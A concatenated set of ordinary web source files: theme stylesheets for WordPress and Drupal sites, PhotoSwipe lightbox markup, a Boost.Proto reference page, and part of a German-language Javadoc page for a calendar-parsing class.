border: 1px solid #e2dede;
background: #FFF;
overflow: hidden;
}
code.has-numbering{
margin-left: 30px;
}
code.has-numbering.widther{
margin-left: 35px;
}
.pre-numbering{
margin: 0px;
position: absolute;
top: 0;
left: 0;
width: 20px;
padding: 0.5em 3px 0.7em 5px;
border-right: 1px solid #C3CCD0;
text-align: right;
color: #AAA;
background-color: #fafafa;
}
.pre-numbering.widther {
width: 35px;
}
</style>
<!--自定义样式设置-->
<style>
.nav {
width: 552px;
}
.nav.fullscreen {
margin-left: -552px;
}
.nav-left {
width: 130px;
}
@media screen and (max-width: 1468px) {
.nav {
width: 522px;
}
.nav.fullscreen {
margin-left: -522px;
}
.nav-left {
width: 130px;
}
}
@media screen and (max-width: 1024px) {
.nav {
width: 522px;
margin-left: -522px
}
.nav.fullscreen {
margin-left: 0;
}
.nav .hide-list.fullscreen {
left: 522px
}
}
@media screen and (max-width: 426px) {
.nav {
width: 100%;
}
.nav-left {
width: 100%;
}
}
.nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
color: #383636;
}
.nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
color: #5e5e5f;
}
.nav-right nav a.hover, #local-search-result a.hover{
background-color: #e2e0e0;
}
/*列表样式*/
.post .pjax article .article-entry>ol, .post .pjax article .article-entry>ul, .post .pjax article>ol, .post .pjax article>ul{
border: #e2dede solid 1px;
border-radius: 10px;
padding: 10px 32px 10px 56px;
}
.post .pjax article .article-entry li>ol, .post .pjax article .article-entry li>ul,.post .pjax article li>ol, .post .pjax article li>ul{
padding-top: 5px;
padding-bottom: 5px;
}
.post .pjax article .article-entry>ol>li, .post .pjax article .article-entry>ul>li,.post .pjax article>ol>li, .post .pjax article>ul>li{
margin-bottom: auto;
margin-left: auto;
}
.post .pjax article .article-entry li>ol>li, .post .pjax article .article-entry li>ul>li,.post .pjax article li>ol>li, .post .pjax article li>ul>li{
margin-bottom: auto;
margin-left: auto;
}
/* 背景图样式 */
/*引用块样式*/
/*文章列表背景图*/
.nav-right:before {
content: ' ';
display: block;
position: absolute;
left: 0;
top: 0;
width: 100%;
height: 100%;
opacity: 0.3;
background: url("https://i.loli.net/2019/07/22/5d3521411f3f169375.png");
background-repeat: no-repeat;
background-position: 50% 0;
-ms-background-size: cover;
-o-background-size: cover;
-moz-background-size: cover;
-webkit-background-size: cover;
background-size: cover;
}
</style>
<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
<!-- Background of PhotoSwipe.
It's a separate element, as animating opacity is faster than rgba(). -->
<div class="pswp__bg"></div>
<!-- Slides wrapper with overflow:hidden. -->
<div class="pswp__scroll-wrap">
<!-- Container that holds slides. PhotoSwipe keeps only 3 slides in DOM to save memory. -->
<!-- don't modify these 3 pswp__item elements, data is added later on. -->
<div class="pswp__container">
<div class="pswp__item"></div>
<div class="pswp__item"></div>
<div class="pswp__item"></div>
</div>
<!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
<div class="pswp__ui pswp__ui--hidden">
<div class="pswp__top-bar">
<!-- Controls are self-explanatory. Order can be changed. -->
<div class="pswp__counter"></div>
<button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
<button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
<!-- Preloader demo https://codepen.io/dimsemenov/pen/yyBWoR -->
<!-- element will get class pswp__preloader--active when preloader is running -->
<div class="pswp__preloader">
<div class="pswp__preloader__icn">
<div class="pswp__preloader__cut">
<div class="pswp__preloader__donut"></div>
</div>
</div>
</div>
</div>
<div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
<div class="pswp__share-tooltip"></div>
</div>
<button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
</button>
<button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
</button>
<div class="pswp__caption">
<div class="pswp__caption__center"></div>
</div>
</div>
</div>
</div>
</html>
|
wp-content/themes/fgeek/css/editor-style.css | diptigandhi24/Trade-Bucket-Global | /*
Theme Name: fGeek
Description: Used to style the TinyMCE editor.
*/
@font-face {
font-family: 'FontAwesome';
src: url('../fonts/fontawesome-webfont.eot?v=4.0.3');
src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.0.3') format('embedded-opentype'),
url('../fonts/fontawesome-webfont.woff?v=4.0.3') format('woff'),
url('../fonts/fontawesome-webfont.ttf?v=4.0.3') format('truetype'),
url('../fonts/fontawesome-webfont.svg?v=4.0.3#fontawesomeregular') format('svg');
font-weight: normal;
font-style: normal;
}
h1,
h2,
h3,
h4,
h5,
h6 {
clear: both;
font-weight: 700;
margin: 36px 0 12px;
}
h1 {
font-size: 26px;
line-height: 1.3846153846;
}
h2 {
font-size: 24px;
line-height: 1;
}
h3 {
font-size: 22px;
line-height: 1.0909090909;
}
h4 {
font-size: 20px;
line-height: 1.2;
}
h5 {
font-size: 18px;
line-height: 1.3333333333;
}
h6 {
font-size: 16px;
line-height: 1.5;
}
h1:first-child,
h2:first-child,
h3:first-child,
h4:first-child,
h5:first-child,
h6:first-child {
margin-top: 0;
}
address {
font-style: italic;
margin-bottom: 24px;
}
abbr[title] {
border-bottom: 1px dotted #2b2b2b;
cursor: help;
}
b,
strong {
font-weight: 700;
}
cite {
border: 0;
}
cite,
dfn,
em,
i {
font-style: italic;
}
mark,
ins {
background: #fff9c0;
border: 0;
color: inherit;
text-decoration: none;
}
p {
margin: 0 0 24px;
}
code,
kbd,
tt,
var,
samp,
pre {
font-family: monospace, serif;
font-size: 15px;
line-height: 1.6;
}
pre {
border: 1px solid rgba(0, 0, 0, 0.1);
margin-bottom: 24px;
max-width: 100%;
overflow: auto;
padding: 12px;
white-space: pre;
white-space: pre-wrap;
word-wrap: break-word;
}
blockquote,
q {
quotes: none;
}
blockquote:before,
q:before {
font-family: 'FontAwesome';
content: "\f10d";
color:#DEDEDE;
font-size:36px;
float:left;
margin:0 1% 0 0;
}
small {
font-size: smaller;
}
big {
font-size: 125%;
}
sup,
sub {
font-size: 75%;
height: 0;
line-height: 0;
position: relative;
vertical-align: baseline;
}
sup {
bottom: 1ex;
}
sub {
top: .5ex;
}
dl {
margin: 0 0 24px;
}
dt {
font-weight: bold;
}
dd {
margin: 0 0 24px;
}
ul,
ol {
list-style: none;
margin: 0 0 24px 20px;
padding-left: 0;
}
ul {
list-style: none;
margin-left:3px;
}
ul li:before {
font-family:'FontAwesome';
content:"\f105";
color:#AAA;
display:inline-block;
text-align:center;
margin:0 7px 7px 0;
}
del {
color: #767676;
}
hr {
background-color: rgba(0, 0, 0, 0.1);
border: 0;
height: 1px;
margin-bottom: 23px;
}
a {
color: #24890d;
text-decoration: none;
}
a:visited {
color: #24890d;
}
a:focus {
outline: thin dotted;
}
a:active,
a:hover {
color: #41a62a;
outline: 0;
}
.alignleft {
float: left;
margin: 7px 24px 7px 0;
}
.alignright {
float: right;
margin: 7px 0 7px 24px;
}
.aligncenter {
clear: both;
display: block;
margin: 7px auto;
}
blockquote.alignleft,
blockquote.alignright {
border-top: 1px solid rgba(0, 0, 0, 0.1);
border-bottom: 1px solid rgba(0, 0, 0, 0.1);
padding-top: 17px;
width: 50%;
}
blockquote.alignleft p,
blockquote.alignright p {
margin-bottom: 17px;
}
.mceItemTable {
border: 1px solid rgba(0, 0, 0, 0.1);
border-width: 1px 0 0 1px;
border-collapse: separate;
border-spacing: 0;
font-size: 14px;
line-height: 1.2857142857;
margin-bottom: 24px;
width: 100%;
}
.mceItemTable th,
.mceItemTable caption {
border: 1px solid rgba(0, 0, 0, 0.1);
border-width: 0 1px 1px 0;
font-weight: 700;
padding: 8px;
text-align: left;
text-transform: uppercase;
vertical-align: baseline;
}
.mceItemTable td {
border: 1px solid rgba(0, 0, 0, 0.1);
border-width: 0 1px 1px 0;
font-family: Lato, sans-serif;
font-size: 14px;
padding: 8px;
vertical-align: baseline;
}
img {
height: auto;
max-width: 474px;
vertical-align: middle;
}
.wp-caption {
background: transparent;
border: none;
color: #767676;
margin: 0 0 24px 0;
max-width: 474px;
padding: 0;
text-align: left;
}
.wp-caption.alignleft {
margin: 7px 14px 7px 0;
}
.wp-caption.alignright {
margin: 7px 0 7px 14px;
}
.wp-caption.aligncenter {
margin: 7px 0;
}
.wp-caption-dt {
margin: 0;
}
.wp-caption .wp-caption-text,
.wp-caption-dd {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
font-size: 12px;
font-style: italic;
line-height: 1.5;
margin: 9px 0;
padding: 0 10px 0 0;
text-align: left;
}
.mceTemp + ul,
.mceTemp + ol {
list-style-position: inside;
}
|
sites/all/themes/two/css/respond.css | lindsaywilson/200percent |
@media (max-width: 1024px) {
/* HEADER */
.tagline.hear{ left:20px}
.tagline.taste{ right:20px}
/* FOOTER */
#footer ul.menu{ margin-left:0}
#footer ul.menu li:nth-child(2),
#footer ul.menu li:nth-child(3){ margin:0}
#footer .barrel{ display:none}
#footer .copyright{ margin-top:20px}
/* PAGE */
.front #content,
#newsletter .inner,
.view-profiles .views-row-first .inner,
.view-profiles .views-row-last .inner{ background:none}
.violin{ background-position:20px 0}
.front-content,
#newsletter .inner,
#whatshappening .inner,
.view-photo-gallery,
.view-video-gallery,
.node-webform,
#title .inner,
#newsletter p,
.view-news .views-row{ padding-left:20px; padding-right:20px}
#newsletter{ text-align:center}
#newsletter p{ max-width:inherit; }
#newsletter form{ display:inline; margin:0 auto}
#newsletter .form-item{ display:inline-block; float:none}
#newsletter input[type="submit"]{ position:relative; top:3px}
/* HOME */
.front .flexslider .name{ left:20px}
/* SUSANNE & KATHY */
.view-profiles .views-row .grid-onethird.content,
.view-profiles .views-row .grid-twothird.image{ width:49%}
.view-profiles .views-row-first .views-field .inner{ padding-right:10px}
.view-profiles .views-row-last .views-field .inner{ padding:0 10px}
/* SHOP */
.node-type-wine .node{ padding:0 20px}
/* WHATS HAPPENING */
.view-news .grid-half.body{ margin-right:0}
/* VIDEO GALLERY */
.view-video-gallery .grid-onethird.content{ margin-right:0}
}
@media (max-width: 940px) {
.tagline.hear,
.tagline.taste{ display:none}
/* SHOP */
.node-type-wine .node .grid{ float:left;}
.node-type-wine .node .product-image{ float:right;}
.node-type-wine .product-details{ margin-top:30px}
.node-type-wine .product-details .grid:first-of-type{ margin-right:15px}
.node-type-wine .product-price .label{ padding-top:40px; font-size:2.7em; margin-right:20px}
.node-type-wine .add-to-cart a{ right:-15px}
}
@media (min-width:801px) and (max-width: 900px) {
nav ul li a{ padding:0 13px}
}
@media (max-width: 800px) {
#page{ position:relative} /* DO NOT DELETE, JS MEDIA QUERY */
.grid{ float:none; width:auto; margin:0 auto}
.grid.grid-third{ width:auto}
nav{ line-height:44px; background:url(../images/bg_line.png) center bottom no-repeat; display:none}
nav ul li{ display:block}
/* PAGE */
.node-type-page #title .inner,
.node-type-webform #title .inner{ height:auto; padding-bottom:20px}
#title h1{ margin-top:20px}
.page-node-3 #title .inner,
.page-node-4 #title .inner,
.page-node-5 #title .inner{ background:none}
.violin{ display:none}
/* FOOTER */
.view-tweets{ padding: 20px 0}
.view-tweets .view-content{ padding-top:100px; background-size:100px auto; min-height:inherit}
.view-tweets .views-row-first{ margin-bottom:20px}
.view-tweets .views-row-first,
.view-tweets .views-row-last{ float:none; width:auto}
.grid.social-links{ margin-top:20px}
#footer{ padding:30px 0}
#footer ul.menu{ display:none}
/* HOME */
.home-logo,
.front .field-name-body{ float:none; width:auto; max-width:auto; margin:0 auto; text-align:center}
.home-logo{ margin-bottom:20px; text-align:center; max-width:300px}
#whatshappening h2{ margin:30px 0 0 0}
#newsletter form{ max-width:100%}
#newsletter .form-item:first-child{ margin-right:0; width:100%}
.flex-control-nav{ display:none}
/* SUSANNE & KATHY */
.view-profiles .views-row .grid-onethird.content{ float:none; width:auto; padding:0 20px; margin-top:20px}
.view-profiles .views-row .grid-twothird.image{ width:auto; max-width:320px; float:none}
.view-profiles .views-row-first .views-field .inner,
.view-profiles .views-row-last .views-field .inner{ padding:0}
/* WHATS HAPPENING */
.view-news .grid-half.body{ float:none; width:auto}
.view-news .grid-half.image{ float:none; width:auto; margin:20px auto 0; text-align:center}
/* PHOTO GALLERY */
.view-photo-gallery{ padding:0}
#sb-container{ display:none!important}
.view-photo-gallery a, .sb-image, .sb-gallery, .sb-gallery-field_images{ cursor:default}
/* VIDEO GALLERY */
.view-video-gallery .grid-onethird.content,
.view-video-gallery .grid-twothird.video{ float:none; width:auto; margin:0}
.view-video-gallery ul#share{ position:relative; top:0; left:0; text-align:center}
.view-video-gallery ul#share li{ display:inline-block; text-align:left; padding:20px 10px 0}
.view-video-gallery ul#share li:first-child{ background:none;}
.view-video-gallery .grid-twothird.video{ margin:0 -20px}
/* GET IN TOUCH */
.page-node-5 .field-name-body,
.page-node-5 .webform-client-form{ float:none; width:auto}
.page-node-5 .field-name-body{ margin:20px 0 60px}
.page-node-5 .webform-client-form{ padding-bottom:100px}
}
@media (max-width: 767px) {
/* SHOP */
.node-type-wine .node .grid{ float:none; width:auto}
.node-type-wine .node .product-image{ display:none}
.node-type-wine .product-price .label{ padding-top:0}
}
@media (max-width: 530px) {
/* SHOP */
.node-type-wine .node .logo{ text-align:center; left:30px}
.node-type-wine .product-price,
.node-type-wine .add-to-cart,
.display-price{ text-align:center}
.node-type-wine .product-price .label{ margin-right:0}
.node-type-wine .add-to-cart a{ position:static}
}
@media (max-width: 480px) {
/* HEADER */
#header{ height:auto}
#header #logo{ padding:0 20px; margin-bottom:0}
#header #logo img{display:block}
/* FOOTER */
#newsletter input[type="email"]{ height:40px}
label, #newsletter label,
input, select, textarea{ font-size:1.6em; top:10px}
input[type="submit"]{ font-size:1.6em}
#newsletter p{ font-size:2.5em}
/* HTML*/
h1, h2, h3, h4{ font-size:2.5em}
/* PAGE */
#title h1,
#title h1 span{ width:100%; background-size:100% auto; background-repeat:no-repeat}
.page-node-2 #title h1,
.page-node-2 #title h1 span,
.page-node-3 #title h1,
.page-node-3 #title h1 span,
.page-node-4 #title h1,
.page-node-4 #title h1 span{ width:100%}
.view .date{ font-size:1.6em}
/* HOME */
.front .flexslider .name{ position:relative; width:100%; background-size:100% auto; padding:20px 0; left:0; top:20px; max-width:70%}
.front .field-name-body p{ font-size:1.8em}
.view-tweets .views-field-text{ font-size:1.6em}
.view-tweets .views-field-created-time{ font-size:1.4em}
#whatshappening .inner{ height:auto; }
#whatshappening h2,
#whatshappening h2 span{ width:100%; background-size:100% auto; margin:10px 0 0 0}
/* SUSANNE & KATHY */
.view-profiles .views-row-first h2,
.view-profiles .views-row-last h2{ margin-left:auto; margin-right:auto}
.view-profiles .views-row-first .body,
.view-profiles .views-row-last .body{ padding-left:0; text-align:center}
.view-profiles .views-row a.readmore{ background-position:center 0; text-align:center; display:block }
.view-profiles .views-row a.readmore:hover{ background-position:center -120px;}
.view-profiles .views-row-first a.readmore,
.view-profiles .views-row-last a.readmore{ margin-left:0}
/* WHATS HAPPENING */
.view-id-news{text-align:center}
.view-news .grid-half.body{ padding-right:0}
.view-news .grid-half.image{ margin-right:-20px; margin-left:-20px}
/* PHOTO GALLERY */
.view-photo-gallery .sb-image{ float:none; width:auto; text-align:center; margin:0 auto}
/* VIDEO GALLERY */
.view-video-gallery{ padding:0}
.view-video-gallery h3,
.view-video-gallery .date{ text-align:center; padding:0 20px}
.view-video-gallery .grid-twothird.video{ margin:0}
.view-video-gallery ul#share li{ padding:15px 40px 0 25px;}
.view-video-gallery ul#share li:first-child{ padding-bottom:15px; background:url(../images/bg_line.png) bottom right no-repeat}
/* GET IN TOUCH */
.page-node-5 .webform-client-form{ padding-bottom:140px}
.page-node-5 .contact.susanne,
.page-node-5 .contact.hillside{ background-position:center 0; padding:160px 0 0; text-align:center; margin-bottom:10px}
.page-node-5 .contact.hillside{ padding-top:200px}
.page-node-5 .contact-info p,
.page-node-5 .contact-info p:first-child{ float:none; width:auto; margin:0 0 15px; padding:0}
}
@media (max-width: 380px) {
.page-node-5 #title h1,
.page-node-5 #title h1 span{ width:100%}
}
@media (max-width: 320px) {
/* PAGE */
#title h1{ height:120px}
/* HOME */
#whatshappening h2{ height:130px}
/* SUSANNE & KATHY */
.view-profiles .views-row-last h2, .view-profiles .views-row-last h2 span{ width:100%}
.view-profiles .views-row-last h2 span{ background-size:100% auto}
/* GET IN TOUCH */
.page-node-5 .webform-client-form{ padding-bottom:170px}
.page-node-5 #title h1{ height:150px}
}
|
boost/doc/html/boost/proto/not_equal_to/impl.html | geodynamics/gale | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Struct template impl</title>
<link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76.1">
<link rel="home" href="../../../index.html" title="The Boost C++ Libraries BoostBook Documentation Subset">
<link rel="up" href="../not_equal_to.html#id2540941" title="Description">
<link rel="prev" href="../not_equal_to.html" title="Struct template not_equal_to">
<link rel="next" href="../logical_or.html" title="Struct template logical_or">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../boost.png"></td>
<td align="center"><a href="../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="../not_equal_to.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../not_equal_to.html#id2540941"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="../logical_or.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="refentry">
<a name="boost.proto.not_equal_to.impl"></a><div class="titlepage"></div>
<div class="refnamediv">
<h2><span class="refentrytitle">Struct template impl</span></h2>
<p>boost::proto::not_equal_to::impl</p>
</div>
<h2 xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv-title">Synopsis</h2>
<div xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv"><pre class="synopsis"><span class="comment">// In header: <<a class="link" href="../../../proto/reference.html#header.boost.proto.traits_hpp" title="Header <boost/proto/traits.hpp>">boost/proto/traits.hpp</a>>
</span>
<span class="keyword">template</span><span class="special"><</span><span class="keyword">typename</span> <a class="link" href="../../../Expr.html" title="Concept Expr">Expr</a><span class="special">,</span> <span class="keyword">typename</span> State<span class="special">,</span> <span class="keyword">typename</span> Data<span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="impl.html" title="Struct template impl">impl</a> <span class="special">:</span>
<span class="keyword"></span> <a class="link" href="../pass_through.html" title="Struct template pass_through">proto::pass_through</a><mot_equal_to>::template impl<Expr, State, Data>
<span class="special">{</span>
<span class="special">}</span><span class="special">;</span></pre></div>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2008 Eric Niebler<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="../not_equal_to.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../not_equal_to.html#id2540941"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="../logical_or.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
doc/com/johbrak/klautor/Parser.html | Letterus/Klautor | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN""http://www.w3.org/TR/REC-html40/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc on Thu Mar 11 19:59:34 CET 2004 -->
<TITLE>
Parser
</TITLE>
<META NAME="keywords" CONTENT="com.johbrak.klautor.Parser,Parser class">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style">
</HEAD>
<SCRIPT>
function asd()
{
parent.document.title="Parser";
}
</SCRIPT>
<BODY BGCOLOR="white" onload="asd();">
<!-- ========== START OF NAVBAR ========== -->
<A NAME="navbar_top"><!-- --></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0">
<TR>
<TD COLSPAN=3 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/Parser.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../com/johbrak/klautor/ParseManager.html"><B>PREV CLASS</B></A>
<A HREF="../../../com/johbrak/klautor/PrefsMenu.html"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html" TARGET="_top"><B>FRAMES</B></A>
<A HREF="Parser.html" TARGET="_top"><B>NO FRAMES</B></A>
<SCRIPT>
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html" TARGET=""><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html" TARGET=""><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<!-- =========== END OF NAVBAR =========== -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
com.johbrak.klautor</FONT>
<BR>
Class Parser</H2>
<PRE>
java.lang.Object
|
+--<B>com.johbrak.klautor.Parser</B>
</PRE>
<HR>
<DL>
<DT>public class <B>Parser</B><DT>extends java.lang.Object</DL>
<P>
Der Parser enthaelt nur drei statische Methoden:
parse(String string), parseUpdates(String string) und deparse().
Erstere wird genutzt, um die Termininformationen aus der Datei
(bzw. eigentlich dem String) aus dem Internet zu filtern und
in den Termine-Vektor einzufuegen, letztere fuegt alle Termininformationen
aus dem Vektor wieder zu einem Strng zusammen, damit sie im
permanten Speicher des Mobiltelephones unkompliziert gesichert
werden koennen.
"parseUpdates" tut fast das selbe wie "parse", jedoch mit dem
Unterschied, dass Daten im Termine-Vektor ueberschrieben werden,
wenn die uebergebenen anders/aktueller sind als die im Vektor.
<P>
<P>
<DL>
<DT><B>Author:</B></DT>
<DD>Johannes Brakensiek <a href="mailto:johannes@quackes.de"><code><johannes@quackes.de></code></a></DD>
</DL>
<HR>
<P>
<!-- ======== NESTED CLASS SUMMARY ======== -->
<!-- =========== FIELD SUMMARY =========== -->
<A NAME="field_summary"><!-- --></A>
<TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
<B>Field Summary</B></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>private <A HREF="../../../com/johbrak/klautor/Termine.html">Termine</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../com/johbrak/klautor/Parser.html#termine">termine</A></B></CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<A NAME="constructor_summary"><!-- --></A>
<TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
<B>Constructor Summary</B></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><B><A HREF="../../../com/johbrak/klautor/Parser.html#Parser()">Parser</A></B>()</CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
<B>Method Summary</B></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../com/johbrak/klautor/Parser.html#deparse()">deparse</A></B>()</CODE>
<BR>
Macht aus dem Termine-Vektor eine Termine-Datei (bzw. </TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../com/johbrak/klautor/Parser.html#parse(java.lang.String)">parse</A></B>(java.lang.String string)</CODE>
<BR>
Diese Methode wertet die Daten aus dem Internet aus.
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../com/johbrak/klautor/Parser.html#parseUpdates(java.lang.String)">parseUpdates</A></B>(java.lang.String string)</CODE>
<BR>
Hier gilt dasselbe wie fuer parse(String string), jedoch mit dem
Unterschied, dass der ausgewertete Termin einen Termin im Vektor
uebschreibt, sofern sich diese in einigen Punkten unterscheiden.
</TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A>
<TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TD><B>Methods inherited from class java.lang.Object</B></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD>
</TR>
</TABLE>
<P>
<!-- ============ FIELD DETAIL =========== -->
<A NAME="field_detail"><!-- --></A>
<TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=1><FONT SIZE="+2">
<B>Field Detail</B></FONT></TD>
</TR>
</TABLE>
<A NAME="termine"><!-- --></A><H3>
termine</H3>
<PRE>
private <A HREF="../../../com/johbrak/klautor/Termine.html">Termine</A> <B>termine</B></PRE>
<DL>
<DL>
</DL>
</DL>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<A NAME="constructor_detail"><!-- --></A>
<TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=1><FONT SIZE="+2">
<B>Constructor Detail</B></FONT></TD>
</TR>
</TABLE>
<A NAME="Parser()"><!-- --></A><H3>
Parser</H3>
<PRE>
public <B>Parser</B>()</PRE>
<DL>
</DL>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=1><FONT SIZE="+2">
<B>Method Detail</B></FONT></TD>
</TR>
</TABLE>
